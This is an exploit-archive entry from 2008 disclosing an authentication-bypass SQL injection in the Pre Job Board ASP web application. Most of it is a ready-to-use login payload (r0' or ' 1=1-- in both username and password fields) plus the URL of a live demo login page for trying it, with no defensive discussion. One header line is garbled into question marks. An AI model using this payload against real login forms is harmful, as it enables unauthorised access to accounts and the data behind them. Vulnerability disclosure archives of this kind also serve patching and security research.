id: 4209
date: 11/19/2008
title: Pre Job Board (Auth Bypass) Remote SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

==============================================================
Pre Job Board (Auth Bypass) Remote SQL Injection Vulnerability
==============================================================



[~] ----------------------------??? ???? ?????? ??????------------------------------ 
[~]Tybe: (Auth Bypass) SQL Injection Vulnerability 

[~]Vendor:http://www.preproject.com/preaspjobboard.asp

[~]Software: PRE JOB BOARD

[~]author: R3d-D3v!L 

[~] Date: 21.11.2008 

[~] Home: www.ahacker.biz 

[~] contact: N/A 
[~] ----------------------------------------------------------- 


[~] Exploit: 

username: r0' or ' 1=1-- 
password: r0' or ' 1=1-- 


[~] login for demo: 

http://preproject.com/preaspjobboard//Employee/emp_login.asp


[~]-------------------------------------------------------------------------------- 




#  0day.today [2023-03-21]  #